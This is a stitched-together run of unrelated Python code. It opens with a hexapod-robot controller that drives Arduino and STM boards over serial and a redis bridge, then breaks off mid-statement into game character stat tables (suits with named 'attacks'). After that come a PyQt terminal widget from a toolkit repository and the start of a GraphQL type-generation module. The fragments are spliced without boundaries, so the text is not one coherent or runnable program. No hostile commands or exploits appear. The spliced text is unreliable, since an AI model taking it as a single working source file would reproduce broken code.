temp_arduino_ports.append([port,id0,id1])
break
result = re.search(b"stm",line)
if result:
logger.debug("stm")
stm_ports.append(port)
break
time.sleep(0.1)
current_time = time.time()
ser.close()
# motor id check and assign id to detected and sorted port
i = 0
for port in sorted(temp_arduino_ports,key=lambda x:x[1]):
arduino_ports.append(port[0])
if port[1].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i,port[1].decode('utf-8'))
id_motor_mapping.setdefault(port[1].decode('utf-8'),i)
arduino_id_mapping.setdefault(port[1].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
if port[2].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i+len(temp_arduino_ports),port[2].decode('utf-8'))
id_motor_mapping.setdefault(port[2].decode('utf-8'),i+len(temp_arduino_ports))
arduino_id_mapping.setdefault(port[2].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
i = i + 1
logger.debug("arduino_ports = %s" % arduino_ports)
logger.debug("motor_id_mapping = %s" % motor_id_mapping)
logger.debug("id_motor_mapping = %s" % id_motor_mapping)
logger.debug("arduino_id_mapping = %s" % arduino_id_mapping)
logger.debug("stm_ports = %s" % stm_ports)
# opening serial ports
if len(arduino_ports) > 0:
for i in range(len(arduino_ports)):
for _ in range(5):
try:
s = serial.Serial(arduino_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
arduino_ser.append(s)
if len(stm_ports) > 0:
for i in range(len(stm_ports)):
for _ in range(5):
try:
s = serial.Serial(stm_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
stm_ser.append(s)
logger.debug("************************************")
logger.debug(" port set up end !! ")
logger.debug("************************************")
def arduino_command(command,sender_queue):
if arduino_available == False:
return
if command[0] == "move":
if len(command) == 4:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],command[3])
elif len(command) == 3:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],motor_height[command[1]])
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
else:
item = "None"
pass
logger.debug("[S] arduino[%1d]: %s" %(arduino_id_mapping[motor_id_mapping[command[1]]] ,item))
time.sleep(0.010)
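# stm_command() maps the high-level posture commands onto the STM serial protocol:
# "stm_init" -> "init", "right" -> "aa", "left" -> "bb", "home" -> "cc",
# "up"/"down" -> "up <leg>" / "down <leg>", and updates motor_height so later "move"
# commands know which payload value to send for each leg.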
def stm_command(command,sender_queue):
if stm_available == False:
return
print(command)
if command[0] == "stm_init":
item = "init\r\n"
for i in range(legs):
motor_height[i] = 1
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "right":
if legs == 6:
#item = "right\r\n"
item = "aa\r\n"
for i in range(legs):
motor_height[i] = i % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "left":
if legs == 6:
#item = "left\r\n"
item = "bb\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "home":
print(command[0])
if legs == 6:
#item = "cc\r\n"
item = "cc\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "up":
item = "up {}\r\n".format(command[1])
motor_height[command[1]] = 0
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "down":
item = "down {}\r\n".format(command[1])
motor_height[command[1]] = 1
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
if item != "None":
logger.debug("[S] stm: %s" % item)
logger.debug("motor_height: %s" % motor_height)
time.sleep(0.002)
def sender(queue,channel):
print('sender channel=<',channel,'>')
toChannel = channel+'->uart'
while True:
item = queue.get()
print('sender item=<',item,'>')
if item is None:
queue.task_done()
break
client.publish(toChannel, item.encode('utf-8'))
def reader(channel):
print('reader channel=<',channel,'>')
p = client.pubsub()
p.subscribe(channel+'<-uart')
for message in p.listen():
print(message)
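# sender()/reader() replace direct serial I/O with a redis pub/sub bridge: sender()
# drains its queue and publishes each line on '<channel>->uart', while reader()
# subscribes to '<channel><-uart' and prints whatever comes back. For example, a worker
# started with a (hypothetical) channel name 'arduino0' would publish on
# 'arduino0->uart' and listen on 'arduino0<-uart'; the actual channel names are
# assigned where the threads are created, outside this excerpt.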
def motion_player(motion,sender_queue):
logger.debug("motion :: %s" % motion)
for command in motion:
if command[0] == "stm_init":
stm_command(command,sender_queue)
elif command[0] == "right":
stm_command(command,sender_queue)
elif command[0] == "left":
stm_command(command,sender_queue)
elif command[0] == "up":
stm_command(command,sender_queue)
elif command[0] == "down":
stm_command(command,sender_queue)
elif command[0] == "home":
stm_command(command,sender_queue)
elif command[0] == "move":
arduino_command(command,sender_queue)
elif command[0] == "wait":
time.sleep(command[1])
else:
pass
def scenario_player(scenario,sender_queue):
logger.debug("************************************")
logger.debug(" scenario start !! ")
logger.debug("************************************")
if stm_available and legs == 6:
for i in range(scenario_repeat):
logger.debug("---- turn %d / %d ----" % (i+1,scenario_repeat))
for motion in scenario:
motion_player(motion,sender_queue)
else:
pass
logger.debug("************************************")
logger.debug(" scenario end !! ")
logger.debug("************************************")
def menu(sender_queue):
logger.debug("************************************")
logger.debug(" start menu ")
logger.debug("************************************")
escape_mode = False
motor_id = -1
getch = _Getch()
while True:
key = getch()
logger.debug('{0} pressed'.format(key))
if key == b'\x03':
break
if key == b'q':
break
if escape_mode == False and key in key_command_map:
command = key_command_map[key]
elif escape_mode == True and key in linux_esc_key_command_map:
command = linux_esc_key_command_map[key]
else:
continue
if command[0] == "escape":
escape_mode = True
elif command[0] == "scenario":
logger.debug("scenario {}".format(command[1]))
if command[1] == ["walk"]:
scenario_player(scenario_walk,sender_queue)
elif command[1] == ["back"]:
scenario_player(scenario_back,sender_queue)
else:
pass
motor_id = -1
escape_mode = False
elif command[0] == "motion":
logger.debug("motion {}".format(command[1]))
motion_player(command[1],sender_queue)
motor_id = -1
escape_mode = False
elif command[0] == "motor_command":
logger.debug("motor_command {}".format(command[1]))
if motor_id == -1 :
logger.debug("motor_id is not set")
pass
elif motor_id < 999:
if command[1] == ["up"]:
motor_command = [["up",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
motor_command = [["down",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
motor_command = [["move",motor_id,0]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",100]:
motor_command = [["move",motor_id,100]]
motion_player(motor_command, sender_queue)
else:
pass
elif motor_id == 999:
if command[1] == ["up"]:
for i in range(legs):
motor_command = [["up",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
for i in range(legs):
motor_command = [["down",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
for i in range(legs):
motor_command = [["move",i,0]]
4, 6, 9),
(50, 60, 70, 80, 90),
(50, 50, 50, 50, 50)))},
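# Each suit entry lists per-level tuples: 'hp', 'def', 'freq' and 'acc' give the stats
# for the relative levels, and every attack is a (attackName, damage, accuracy,
# frequency) record with one value per level.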
'dt': {'name': TTLocalizer.SuitDoubleTalker, 'singularname': TTLocalizer.SuitDoubleTalkerS,
'pluralname': TTLocalizer.SuitDoubleTalkerP,
'level': 2,
'hp': (20, 30, 42, 56, 72),
'def': (10, 15, 20, 25, 30),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'RubberStamp',
(1, 1, 1, 1, 1),
(50, 60, 70, 80, 90),
(5, 5, 5, 5, 5)),
(
'BounceCheck',
(1, 1, 1, 1, 1),
(50, 60, 70, 80, 90),
(5, 5, 5, 5, 5)),
(
'BuzzWord',
(1, 2, 3, 5, 6),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'DoubleTalk',
(6, 6, 9, 13, 18),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'Jargon',
(3, 4, 6, 9, 12),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'MumboJumbo',
(3, 4, 6, 9, 12),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)))},
'ac': {'name': TTLocalizer.SuitAmbulanceChaser, 'singularname': TTLocalizer.SuitAmbulanceChaserS,
'pluralname': TTLocalizer.SuitAmbulanceChaserP,
'level': 3,
'hp': (30, 42, 56, 72, 90),
'def': (15, 20, 25, 30, 35),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'Shake',
(4, 6, 9, 12, 15),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'RedTape',
(6, 8, 12, 15, 19),
(75, 75, 75, 75, 75),
(30, 30, 30, 30, 30)),
(
'Rolodex',
(3, 4, 5, 6, 7),
(75, 75, 75, 75, 75),
(20, 20, 20, 20, 20)),
(
'HangUp',
(2, 3, 4, 5, 6),
(75, 75, 75, 75, 75),
(35, 35, 35, 35, 35)))},
'bs': {'name': TTLocalizer.SuitBackStabber, 'singularname': TTLocalizer.SuitBackStabberS,
'pluralname': TTLocalizer.SuitBackStabberP,
'level': 4,
'hp': (42, 56, 72, 90, 110),
'def': (20, 25, 30, 35, 40),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'GuiltTrip',
(8, 11, 13, 15, 18),
(60, 75, 80, 85, 90),
(40, 40, 40, 40, 40)),
('RestrainingOrder',
(6, 7, 9, 11, 13),
(50, 65, 70, 75, 90),
(25, 25, 25, 25, 25)),
('FingerWag',
(5, 6, 7, 8, 9),
(50, 55, 65, 75, 80),
(35, 35, 35, 35, 35)))},
'sd': {'name': TTLocalizer.SuitSpinDoctor, 'singularname': TTLocalizer.SuitSpinDoctorS,
'pluralname': TTLocalizer.SuitSpinDoctorP,
'level': 5,
'hp': (56, 72, 90, 110, 132),
'def': (25, 30, 35, 40, 45),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'ParadigmShift',
(9, 10, 13, 16, 17),
(60, 75, 80, 85, 90),
(30, 30, 30, 30, 30)),
(
'Quake',
(8, 10, 12, 14, 16),
(60, 65, 70, 75, 80),
(20, 20, 20, 20, 20)),
(
'Spin',
(10, 12, 15, 18, 20),
(70, 75, 80, 85, 90),
(35, 35, 35, 35, 35)),
(
'WriteOff',
(6, 7, 8, 9, 10),
(60, 65, 75, 85, 90),
(15, 15, 15, 15, 15)))},
'le': {'name': TTLocalizer.SuitLegalEagle, 'singularname': TTLocalizer.SuitLegalEagleS,
'pluralname': TTLocalizer.SuitLegalEagleP,
'level': 6,
'hp': (72, 90, 110, 132, 156),
'def': (30, 35, 40, 45, 50),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'EvilEye',
(10, 11, 13, 15, 16),
(60, 75, 80, 85, 90),
(20, 20, 20, 20, 20)),
(
'Jargon',
(7, 9, 11, 13, 15),
(60, 70, 75, 80, 90),
(15, 15, 15, 15, 15)),
(
'Legalese',
(11, 13, 16, 19, 21),
(55, 65, 75, 85, 95),
(35, 35, 35, 35, 35)),
(
'PeckingOrder',
(12, 15, 17, 19, 22),
(70, 75, 80, 85, 95),
(30, 30, 30, 30, 30)))},
'bw': {'name': TTLocalizer.SuitBigWig, 'singularname': TTLocalizer.SuitBigWigS,
'pluralname': TTLocalizer.SuitBigWigP,
'level': 7,
'hp': (90, 110, 132, 156, 200, 462, 992, 1722, 2652),
'def': (35, 40, 45, 50, 55, 60, 65, 70, 70),
'freq': (50, 30, 10, 5, 5, 0, 0, 0, 0),
'acc': (35, 40, 45, 50, 55, 60, 65, 70, 70),
'attacks': (
(
'PowerTrip',
(10, 11, 13, 15, 16, 18, 20, 22, 24),
(75, 80, 85, 90, 95, 95, 95, 95, 95),
(50, 50, 50, 50, 50, 50, 50, 50, 50)),
(
'FingerWag',
(13, 15, 17, 19, 21, 22, 23, 24, 25),
(80, 85, 85, 85, 90, 90, 90, 90, 95),
(50, 50, 50, 50, 50, 50, 50, 50, 50)))},
'sa': {'name': TTLocalizer.SuitSwagAttorney, 'singularname': TTLocalizer.SuitSwagAttorneyS,
'pluralname': TTLocalizer.SuitSwagAttorneyP,
'level': 49,
'hp': (2652, 2652, 2652, 2652, 2562),
'def': (35, 35, 35, 35, 35),
'freq': (100, 0, 0, 0, 0),
'acc': (85, 85, 85, 85, 85),
'attacks': (
(
'Shake',
(25, 25, 25, 25, 25),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'RedTape',
(27, 27, 27, 27, 27),
(75, 75, 75, 75, 75),
(30, 30, 30, 30, 30)),
(
'Rolodex',
(25, 25, 25, 25, 25),
(75, 75, 75, 75, 75),
(20, 20, 20, 20, 20)),
(
'Objection',
(30, 30, 30, 30, 30),
(75, 75, 75, 75, 75),
(35, 35, 35, 35, 35)))},
'm1': {'name': TTLocalizer.SuitM1, 'singularname': TTLocalizer.SuitM1S,
'pluralname': TTLocalizer.SuitM1P,
'level': 0,
'hp': (12, 24, 40, 60, 82),
'def': (2, 5, 10, 12, 15),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'RubberStamp',
(4, 6, 8, 10, 15),
(75, 80, 85, 90, 95),
(20, 20, 20, 20, 20)),
(
'Shred',
(5, 10, 15, 20, 25),
(50, 55, 60, 65, 70),
(20, 20, 20, 20, 20)),
(
'GlowerPower',
(4, 6, 8, 10, 14),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'ParadigmShift',
(8, 10, 15, 18, 20),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'PickPocket',
(4, 4, 6, 6, 10),
(25, 30, 35, 40, 45),
(50, 50, 50, 50, 50)))},
'm2': {'name': TTLocalizer.SuitM2, 'singularname': TTLocalizer.SuitM2S,
'pluralname': TTLocalizer.SuitM2P,
'level': 1,
'hp': (24, 40, 60, 84, 112),
'def': (5, 10, 15, 20, 25),
'freq': (50, 30, 10, 5, 5),
'acc': (45, 50, 55, 60, 65),
'attacks': (
(
'Fired',
(4, 6, 8, 12, 16),
(75, 75, 75, 75, 75),
(10, 10, 10, 10, 10)),
(
'RedTape',
(6, 12, 15, 18, 22),
(75, 75, 75, 75, 75),
(10, 10, 10, 10, 10)),
(
'Withdrawal',
(15, 18, 20, 24, 28),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'ReOrg',
(16, 18, 23, 26, 30),
(95, 95, 95, 95, 95),
(10, 10, 10, 10, 10)),
(
'FillWithLead',
(10, 12, 14, 16, 18),
(95, 95, 95, 95, 95),
(35, 35, 35, 35, 35)),
(
'Liquidate',
(5, 5, 5, 5, 20),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)))},
'm3': {'name': TTLocalizer.SuitM3, 'singularname': TTLocalizer.SuitM3S,
'pluralname': TTLocalizer.SuitM3P,
'level': 2,
'hp': (40, 60, 84, 112, 144),
'def': (10, 15, 20, 25, 30),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'PickPocket',
(5, 6, 7, 8, 15),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'BounceCheck',
(5, 6, 7, 8, 17),
(50, 60, 70, 80, 90),
(15, 15, 15, 15, 15)),
(
'BuzzWord',
(5, 6, 7, 8, 13),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'Schmooze',
(5, 6, 7, 8, 18),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'MumboJumbo',
(5, 6, 7, 8, 20),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)))},
'm4': {'name': TTLocalizer.SuitM4, 'singularname': TTLocalizer.SuitM4S,
'pluralname': TTLocalizer.SuitM4P,
'level': 3,
'hp': (60, 84, 112, 144, 180),
'def': (15, 20, 25, 30, 35),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'HangUp',
(14, 17, 19, 20, 23),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'GuiltTrip',
(16, 19, 20, 21, 23),
(75,
# Repository: manuelmuehlig/ToolBOSCore
# File: include/ToolBOSCore/GenericGUI/TerminalWidget.py
# -*- coding: utf-8 -*-
#
# Terminal for remote process execution monitoring
#
# Copyright (c) Honda Research Institute Europe GmbH
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
import logging
import os
from PyQt5.QtCore import pyqtSignal, Qt, QProcess, QRegularExpression
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from ToolBOSCore.GenericGUI import IconProvider, ProcessExecutor, UnicodeSupport
from ToolBOSCore.Util import Any
lightBlue = QColor( 210, 230, 255 )
lightGreen = QColor( 210, 255, 210 )
lightGrey = QColor( 240, 240, 240 )
lightOrange = QColor( 255, 200, 100 )
lightYellow = QColor( 255, 248, 220 )
lightRed = QColor( 255, 120, 120 )
solidRed = QColor( 255, 0, 0 )
# noinspection PyArgumentList,PyUnresolvedReferences
class TerminalWidget( QWidget, object ):
"""
Contains a QTextEdit (with domain-specific context menu) and a
QLabel indicating the current working directory.
"""
closeRequest = pyqtSignal()
hostChanged = pyqtSignal( str )
terminateAllProcesses = pyqtSignal()
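    # closeRequest asks the parent container to close this terminal, hostChanged
    # reports a new hostname string, and terminateAllProcesses requests that every
    # running task be stopped (forwarded from the embedded text field's context menu).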
def __init__( self, readonly, inactiveColor=lightGrey,
runColor=lightYellow, exitSuccessColor=lightGreen,
exitFailureColor=lightRed, warningHighlightColor=lightOrange,
errorHighlightColor=solidRed, parent=None ):
Any.requireIsBool( readonly )
Any.requireIsInstance( inactiveColor, QColor )
Any.requireIsInstance( runColor, QColor )
Any.requireIsInstance( exitSuccessColor, QColor )
Any.requireIsInstance( exitFailureColor, QColor )
Any.requireIsInstance( warningHighlightColor, QColor )
Any.requireIsInstance( errorHighlightColor, QColor )
super( QWidget, self ).__init__()
self.command = ''
self.hostname = 'localhost'
self.homeDir = os.path.expanduser( '~' )
self.path = os.getcwd()
self.pipe = None
self.standalone = False
self.taskProcess = None
self.withX11Tunnel = False
self._loggingEnabled = False
self._logFilename = ''
self._logFile = None
self.depChecker = None
self._missingDeps = []
self._closeAction = None
self._enabled = False
self._execCommand = None
self._showCommand = None
self._oldPath = self.path
self._oldColor = None
self._oldWinFlags = None
self._outputFilter = None
self._terminating = False
self._inactiveColor = inactiveColor
self._runColor = runColor
self._exitSuccessColor = exitSuccessColor
self._exitFailureColor = exitFailureColor
self._warningHighlightColor = warningHighlightColor
self._errorHighlightColor = errorHighlightColor
self._defaultFont = QFont( 'Arial', 8 )
self.hostnameField = QLineEdit( parent )
self.hostnameField.setFont( self._defaultFont )
self.hostnameField.setToolTip( 'hostname' )
self.hostnameField.setText( self.hostname )
self.hostnameField.setReadOnly( readonly )
# noinspection PyUnresolvedReferences
self.hostnameField.editingFinished.connect( self._onHostnameFieldInput )
self.sepLabel = QLabel( ':', parent )
self.pathField = QLineEdit( parent )
self.pathField.setFont( self._defaultFont )
self.pathField.setToolTip( 'working directory (to change it type "cd ..." in operator shell below)' )
self.pathField.setText( self.path )
# noinspection PyUnresolvedReferences
self.pathField.editingFinished.connect( self._onPathFieldInput )
self.problemIndicator = QPushButton()
self.problemIndicator.hide()
self.xtermButton = QPushButton()
self.xtermButton.setIcon( IconProvider.getIcon( 'utilities-terminal' ) )
self.xtermButton.setToolTip( 'open xterm' )
# search bar
self.searchBar = QLineEdit( parent )
self.searchBar.setFont( self._defaultFont )
self.searchBar.setToolTip( 'search' )
# noinspection PyUnresolvedReferences
self.searchBar.textChanged.connect( self._onSearchBarFieldInput )
self.searchBarLabel = QLabel( 'Search...', parent )
self.searchBarLabel.setFont( self._defaultFont )
# noinspection PyUnresolvedReferences
self.xtermButton.pressed.connect( self._onXtermButton )
self.hLayout = QHBoxLayout()
self.hLayout.setContentsMargins( 0, 0, 0, 0 )
self.hLayout.addWidget( self.hostnameField )
self.hLayout.addWidget( self.sepLabel )
self.hLayout.addWidget( self.pathField )
self.hLayout.addWidget( self.problemIndicator )
self.hLayout.addWidget( self.xtermButton )
self.hLayout.setStretchFactor( self.pathField, 2 )
self.locationWidget = QWidget( parent )
self.locationWidget.setLayout( self.hLayout )
self.hFooterLayout = QHBoxLayout()
self.hFooterLayout.setContentsMargins( 0, 0, 0, 0 )
self.hFooterLayout.addWidget( self.searchBarLabel )
self.hFooterLayout.addWidget( self.searchBar )
self.hFooterLayout.setStretchFactor( self.searchBar, 2 )
self.footerWidget = QWidget( parent )
self.footerWidget.setLayout( self.hFooterLayout )
self.footerWidget.setHidden( True )
self.textField = self._TerminalTextEdit( warningColor=warningHighlightColor,
errorColor=errorHighlightColor,
parent=parent )
self.textField.setColor( self._inactiveColor )
self.textField.closeRequest.connect( self.closeRequest.emit )
self.textField.reRunProcess.connect( self._reRun )
self.textField.terminateThisProcess.connect( self.terminateThis )
self.textField.terminateAllProcesses.connect( self.emitTerminateAll )
self.textField.standaloneRequest.connect( self.toggleStandalone )
self.textField.findRequest.connect( self.toggleSearch )
self.vLayout = QVBoxLayout()
self.vLayout.addWidget( self.locationWidget )
self.vLayout.addWidget( self.textField )
self.vLayout.addWidget( self.footerWidget )
self.setLayout( self.vLayout )
def isSearchBarVisibile( self ):
return self.footerWidget.isVisible()
def searchBarVisibility( self, state ):
Any.requireIsBool( state )
self.footerWidget.setHidden( not state )
def clear( self ):
self.textField.clear()
self.textField.setColor( self._inactiveColor )
if self._logFile:
self._logFile.close()
self._logFile = None
def closeEvent( self, event ):
# in case the user closes the window: don't do that, instead put the
# widget again into the grid-view
event.ignore()
self.toggleStandalone()
def emitTerminateAll( self ):
self._terminating = True
self.terminateAllProcesses.emit()
def isEnabled( self ):
return self._enabled
def kill( self ):
try:
logging.debug( 'terminating process %d', self.pipe.pid )
self.pipe.kill()
except ( AttributeError, OSError ): # no such pipe, or terminated
pass
def run( self ):
self._terminating = False
self.writeCommand( self._showCommand )
self.textField.setColor( self._runColor )
self.taskProcess.start()
def setColor( self, color ):
Any.requireIsInstance( color, QColor )
self.textField.setColor( color )
def setCommand( self, command, showCommand=None ):
"""
In certain cases the actual 'command' which shall be executed
should not be visible to the user in this form.
You may specify an alternative 'showCommand'.
"""
Any.requireIsTextNonEmpty( command )
self.command = command
if not showCommand:
self._showCommand = command
else:
self._showCommand = showCommand
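    # Illustrative sketch (hypothetical 'term' instance and values): hide credentials in the
    # displayed command line while still executing the full command:
    #     term.setCommand( 'ssh user@host -p s3cret -- make', showCommand='ssh user@host -- make' )
    # Only 'showCommand' is written to the terminal widget when the process is started.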
def setEnabled( self, enabled ):
"""
The difference to setReadOnly() is the following:
Use setEnabled() to mark a terminal as active or not.
A disabled widget cannot be used and is shown with lightgrey
shadow.
        In contrast, a terminal should be marked read-only during
        program execution, so that the user cannot change values
        during this time.
"""
self.setReadOnly( not enabled )
self.textField.setEnabled( enabled )
self.pathField.setEnabled( enabled )
if self._enabled != enabled:
# do color store / restore only if state changes, skip in case it
# was already in the desired state (which would lead to problems
# in color management)
if enabled:
# restore color if was not inactive == freshly created
if self._oldColor is not None and \
self._oldColor is not self._inactiveColor:
self.textField.setColor( self._oldColor )
else:
                # when disabling a terminal, store its original color
                # for later restore
self._oldColor = self.textField.getColor()
self.textField.setColor( self._inactiveColor )
self._enabled = enabled
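    # Illustrative sketch (hypothetical 'term' instance) of the intended lifecycle:
    #     term.setEnabled( True )      # terminal becomes usable, previous color is restored
    #     term.setReadOnly( True )     # lock hostname/path fields while a command is running
    #     term.setReadOnly( False )    # unlock the fields once the command has finished
    #     term.setEnabled( False )     # grey the whole terminal out again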
def setHaveTerminateAll( self, status ):
Any.requireIsBool( status )
self.textField.setHaveTerminateAll( status )
def setHostname( self, hostname ):
Any.requireIsTextNonEmpty( hostname )
self.hostname = hostname
logging.debug( "changed hostname to '%s'", self.hostname )
self._updateLabel()
def setReadOnly( self, readOnly ):
"""
The difference to setEnabled() is the following:
Use setEnabled() to mark a terminal as active or not.
A disabled widget cannot be used and is shown with lightgrey
shadow.
        In contrast, a terminal should be marked read-only during
        program execution, so that the user cannot change values
        during this time.
"""
enabled = not readOnly
self.hostnameField.setEnabled( enabled )
self.pathField.setEnabled( enabled ) # not implemented, yet
def setPath( self, path ):
if not path:
path = '~' # fallback to homedir.
# compute new absolute path, resolve ".", ".." or symlinks
path = os.path.expanduser( path )
if os.path.isabs( path ):
path = os.path.abspath( path )
else:
path = os.path.abspath( os.path.join( self.path, path ) )
self.path = path
self._updateLabel()
self.writeText( '%s\n' % self.path )
def setOutputFilter( self, func ):
"""
Callback to be invoked before printing the command output to the
terminal widget. Could be used to perform some textual
replacements before displaying.
The function will receive the original output as text parameter
and is supposed to return the modified text.
Use None to disable output filtering (= display original output).
"""
if func is not None:
Any.requireIsCallable( func )
self._outputFilter = func
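    # Illustrative sketch (hypothetical filter function): strip ANSI color escape
    # sequences from the command output before it is displayed:
    #     import re
    #     def stripAnsi( text ):
    #         return re.sub( r'\x1b\[[0-9;]*m', '', text )
    #     term.setOutputFilter( stripAnsi )
    #     term.setOutputFilter( None )    # disable filtering again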
def setTerminateAll( self, status ):
Any.requireIsBool( status )
self._haveTerminateAll = status
def setToolTip( self, toolTipText ):
Any.requireIsTextNonEmpty( toolTipText )
self.textField.setToolTip( toolTipText )
def setWithX11Tunnel( self, withX11 ):
"""
Use SSH's X11 forwarding when executing commands on | |
"""Module for creating strawberry types for entity models."""
import dataclasses
import enum
import sys
from inspect import isclass
from typing import Any, Dict, ForwardRef, List, Optional, Tuple, Type, Union, cast
import strawberry
from strawberry.annotation import StrawberryAnnotation
from strawberry.arguments import UNSET
from strawberry.field import StrawberryField
from strawberry.schema.types.scalar import DEFAULT_SCALAR_REGISTRY
from strawberry.type import StrawberryType
from strawberry.utils.typing import is_list, is_optional
from strawberry_mage.core.strawberry_types import (
EntityType,
ObjectFilter,
ObjectOrdering,
OrderingDirection,
PrimaryKeyInput,
QueryMany,
QueryManyResult,
QueryOne,
ROOT_NS,
SCALAR_FILTERS,
ScalarFilter,
StrawberryModelInputTypes,
)
from strawberry_mage.core.types import (
GraphQLOperation,
IEntityModel,
ModuleBoundStrawberryAnnotation,
)
if sys.version_info >= (3, 10):
from types import NoneType
else:
NoneType = type(None)
SCALARS = list(DEFAULT_SCALAR_REGISTRY.keys())
class GeneratedType(enum.Enum):
"""Type of a generated entity."""
ENTITY = ""
PRIMARY_KEY_INPUT = "PrimaryKey"
PRIMARY_KEY_FIELD = "PrimaryKeyField"
QUERY_ONE = "QueryOne"
QUERY_MANY = "QueryMany"
QUERY_MANY_INPUT = "QueryManyInput"
CREATE_ONE = "CreateOne"
CREATE_MANY = "CreateMany"
UPDATE_ONE = "UpdateOne"
UPDATE_MANY = "UpdateMany"
DELETE_ONE = "DeleteOne"
DELETE_MANY = "DeleteMany"
INPUTS = "Inputs"
FILTER = "Filter"
ORDERING = "Ordering"
POLYMORPHIC_BASE = "_"
def get_typename(self: "GeneratedType", name: str):
"""
Convert a name to a GeneratedType name based on the enum value.
:param name: name to convert
:return: converted name
"""
return name + self.value
@staticmethod
def get_original(name: str):
"""
Attempt to get the original entity name from a GeneratedType name.
:param name: a name
:return: the original one or name if not matched
"""
for type_ in GeneratedType:
if type_ != GeneratedType.ENTITY and name.endswith(type_.value):
                return name[: -len(type_.value)]
return name
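    # Illustrative (assumed) round trip for an entity called "Author":
    #     GeneratedType.FILTER.get_typename("Author")   -> "AuthorFilter"
    #     GeneratedType.get_original("AuthorFilter")    -> "Author"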
def _create_fields(fields: Dict[str, Any], target_type: GeneratedType = GeneratedType.ENTITY) -> Dict[str, Any]:
strawberry_fields = {
f: StrawberryField(
f,
type_annotation=defer_annotation(a, target_type),
default_factory=lambda: UNSET,
default=UNSET,
)
for f, a in fields.items()
}
return {
**strawberry_fields,
